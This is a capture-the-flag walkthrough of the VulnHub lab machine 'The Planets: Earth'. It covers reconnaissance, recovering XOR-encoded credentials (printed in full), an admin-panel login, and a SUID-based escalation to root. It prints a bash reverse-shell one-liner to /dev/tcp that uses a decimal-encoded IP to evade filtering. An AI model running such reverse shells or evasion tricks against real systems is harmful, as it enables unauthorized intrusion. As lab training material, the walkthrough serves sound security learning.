Walkthrough : VulnHub : The Planets: Earth
About VulnHub
VulnHub offers offline virtual machines, allowing users to practice without competing with other learners. There’s no need to worry about consistent internet access, high pings, or latency. Users can set up their own private labs to practice and learn new skills.
THE PLANETS: EARTH
Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware.
Link : https://www.vulnhub.com/entry/the-planets-earth,755/
OBJECTIVE
Network security is not only concerned about the security of the computers at each end of the communication chain; however, it aims to ensure that the entire network is secure.
Network security entails protecting the usability, reliability, integrity, and safety of network and data. Effective network security defeats a variety of threats from entering or spreading on a network.
The primary goal of network security are Confidentiality, Integrity, and Availability. These three pillar of Network Security are often represented as CIA triangle.
SCOPE
There are two flags on the box: a user and root flag which include an md5 hash.
Disclaimer
All information, techniques and tools described in this write-up are for educational purposes only. Use anything in this write-up at your own discretion, I cannot be held responsible for any damages caused to any systems or yourselves legally. Usage of all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. It is your responsibility to obey all applicable local, state and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using information herein.
Let’s Get Started
sudo arp-scan –l : To find out THE PLANETS: EARTH IP Address
Arp-scan is a low-level network discovery tool used to associate physical (MAC) addresses to logical (IP) addresses. It’s used to identify network assets which may not normally be captured by network scanning devices.
nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine to scan single hosts
So we used nmap –A –T4 192.168.0.107
- A = For aggressive scan , T4 = Fast Scan the speed of scan
After scan we get to know we have 3 open ports on target machine 22,80,443
In port 443 we had Alternative name earth.local & terratest.local
So I read my /etc/hosts file and didn’t find earth.local and other file so I manually added it by using nano command and its worked for me.
So I opened terratest.earth.local in browser and get this result
In this interface we have found these messages in encrypted format
Here I randomly used /robots.txt file. So I browsed in that particular path
https://terratest.earth.local/robots.txt and get this interface
Now lets visit to the testingnotes directory on browser
Checking each variation of /testingnotes.* eventually I find /testingnotes.txt
Here we have found some information
Terra username and testdata.txt file so I opened that file
With this information, I opened CyberChef and searched for XOR. I put the above text in the XOR key part of CyberChef with UTF-8 input and in input part I had given the last key The following message gave me this output.
Now we got the username and password
Username : terra
Password : earthclimatechangebad4humans
Gobuster is a tool used to brute-force URIs including directories and files as well as DNS subdomains.
In gobuster I had found /admin directory
Now lets login with the following credentials using /admin
Successfully Logged in
I tried to reverse shell but that’s not work so i changed my IP address into decimal and try this on CLI command and successfully get the reverse shell
bash –I >& /dev/tcp/3232235626/5678 0>&1
Now we’re going to go ahead and spawn a TTY shell using python
Now lets hunt for the root access
find / -perm -4000 2>/dev/null
The find command is used to search and locate the list of files and directories based on conditions you specify for files that match the arguments.
/usr/bin/reset_root looks interesting.
Lets check the file using strings
Linux strings command is used to return the string characters into files. It primarily focuses on determining the contents of and extracting text from the binary files (non-text file).
After this we tried to get the reset_root file in local machine
And give all the permission to that file
chmod 777 This command will give read, write and execute permission to the owner, group and public.
I tried to execute that file but its giving me this
And then run ltrace on it ltrace ./reset_root
ltrace is a diagnostic and debugging tool for the command line that can be used to display calls that are made to shared libraries. It uses the dynamic library hooking mechanism, which prevents it from tracing calls to statically linked libraries. ltrace also displays return values of the library calls.
From the output, we should make that three files on the shown locations should be present to run the trigger. Therefore, I created those files on the target.
Now let’s switch to root
Will change the directory to root and grab the root_flag.txt
Conclusion
Network security helps protect your workstations from harmful spyware. It also ensures that shared data is kept secure.
Network Security protects your network and data from breaches, intrusions and other threats. This is a vast and overarching term that describes hardware and software solutions as well as processes or rules and configurations relating to network use, accessibility, and overall threat protection.
This is the end. Thank you for reading this write-up.